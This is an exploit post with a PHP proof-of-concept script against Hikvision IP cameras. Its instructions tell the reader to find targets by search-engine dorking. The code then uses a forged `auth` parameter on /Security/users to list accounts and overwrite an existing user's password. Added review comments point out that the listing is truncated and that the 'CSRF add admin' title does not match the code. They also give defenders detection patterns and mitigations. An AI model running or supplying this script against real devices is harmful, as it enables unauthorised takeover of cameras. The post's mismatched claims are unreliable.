=============================================================================================================================================
| # Title : Hikvision IP Camera CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.hikvision.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] The vulnerability has been present in Hikvision products since 2014.
[+] add new admin.
[+] Line 104 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :

// NOTE(review): the listing is truncated at this point. The opening PHP tag, the class
// declaration, the property declarations and the constructor signature are not on the page;
// only the tail of the constructor body survives, so the text below is not runnable as shown.
//
// NOTE(review): the title describes a CSRF that adds an administrator, but the visible code
// does something else: it sends direct requests to /Security/users with an `auth` query
// parameter and overwrites the password of an account that already exists. No cross-site
// request and no account creation appear in the visible code.
//
// For defenders, the observable pattern in the visible code is a GET followed by a PUT to
// /Security/users, both carrying an `auth=` query parameter, over plain HTTP. Web or proxy
// logs and IDS rules can match on that path and parameter. The durable mitigations are the
// vendor's fixed firmware and keeping the camera's web interface unreachable from untrusted
// networks.
target = $target;
        $this->port = $port;
        $this->username = $username;
        $this->password = $password;
        $this->id = $id;
        $this->storeCred = $storeCred;
    }

    /**
     * Probes the device's user-list endpoint and reports how it answered.
     *
     * Sends GET /Security/users with an `auth` query parameter holding
     * base64("admin:" . <random string>). The password part is freshly random on every
     * call, so an HTTP 200 means the device returned the user list without being given a
     * valid credential.
     *
     * @return string 'Vulnerable' on HTTP 200, 'Safe' on any other status code.
     */
    public function check()
    {
        $auth = base64_encode("admin:" . $this->generateRandomPassword());
        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);
        $response = $this->sendRequest('GET', $url);

        // sendRequest() always returns a two-element array, so this branch is not taken.
        // A failed connection arrives here with http_code 0 (cURL reports 0 when no response
        // was received) and is reported as 'Safe' below. A 'Safe' result therefore does not
        // confirm that a device is patched; it may simply have been unreachable.
        if (!$response) {
            return 'No response received from the target!';
        }

        if ($response['http_code'] == 200) {
            echo "Following users are available for password reset...\n";
            // The return value is not checked: simplexml_load_string() yields false when the
            // body is not well-formed XML.
            $xml = simplexml_load_string($response['body']);
            foreach ($xml->User as $user) {
                echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";
            }
            return 'Vulnerable';
        } else {
            return 'Safe';
        }
    }

    /**
     * Runs check() and, if it reports 'Vulnerable', sends the password-change request.
     *
     * Issues PUT /Security/users with the same kind of `auth` parameter as check() and a
     * body built from the id, username and password given to the constructor.
     *
     * @return false|null false when check() does not report 'Vulnerable'; otherwise the
     *                    method falls off the end (null) whether or not the PUT returned 200.
     */
    public function exploit()
    {
        if ($this->check() !== 'Vulnerable') {
            return false;
        }

        echo "Starting the password reset for {$this->username}...\n";
        // The body is sent as application/xml but, as shown, holds only the id, username and
        // password values separated by CRLF. Presumably the XML element markup was stripped
        // when the page was extracted -- TODO confirm against the original listing.
        $postData = "\r\n" . "{$this->id}\r\n" . "{$this->username}\r\n" . "{$this->password}\r\n";
        $auth = base64_encode("admin:" . $this->generateRandomPassword());
        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" .
            urlencode($auth);
        $response = $this->sendRequest('PUT', $url, $postData, 'application/xml');

        // Not taken for the same reason as in check(): the helper never returns a falsy value.
        if (!$response) {
            echo "Target server did not respond to the password reset request\n";
            return false;
        }

        if ($response['http_code'] == 200) {
            // On success the account's stored password has been replaced. From the operator's
            // side, an account that suddenly rejects its known password is worth correlating
            // with a PUT to /Security/users in the logs.
            echo "Password reset for {$this->username} was successfully completed!\n";
            echo "Please log in with your new password: {$this->password}\n";
            if ($this->storeCred) {
                $this->reportCreds();
            }
        } else {
            echo "Unknown Error. Password reset was not successful!\n";
        }
    }

    /**
     * Sends one HTTP request with cURL and returns the status code and body.
     *
     * No timeout and no TLS options are set; the callers build plain http:// URLs.
     *
     * @param string      $method      HTTP method, passed to CURLOPT_CUSTOMREQUEST.
     * @param string      $url         Full request URL.
     * @param string|null $data        Request body; attached only when truthy.
     * @param string|null $contentType Value for the Content-Type header; set only when truthy.
     *
     * @return array 'http_code' (0 when no response was received) and 'body' (false when
     *               curl_exec() fails).
     */
    private function sendRequest($method, $url, $data = null, $contentType = null)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        if ($contentType) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);
        }
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ['http_code' => $http_code, 'body' => $response];
    }

    /**
     * Returns a throwaway string used as the password half of the `auth` parameter.
     *
     * Shuffles a 62-character alphanumeric alphabet and keeps the first $length characters,
     * so no character repeats and at most 62 characters are returned. str_shuffle() is not
     * a cryptographically secure source; the callers use the value only as a filler.
     *
     * @param int $length Number of characters to keep.
     *
     * @return string
     */
    private function generateRandomPassword($length = 10)
    {
        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);
    }

    /**
     * Prints a message saying the credentials were stored; nothing is actually stored.
     */
    private function reportCreds()
    {
        // In a real implementation, you could store the credentials into a database
        echo "Credentials for {$this->username} were added to the database...\n";
    }
}

// Example usage
// 'target-ip' is a placeholder. Only the first constructor argument is passed here, so the
// missing constructor signature presumably gives the remaining parameters default values.
$exploit = new HikvisionExploit('target-ip');
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================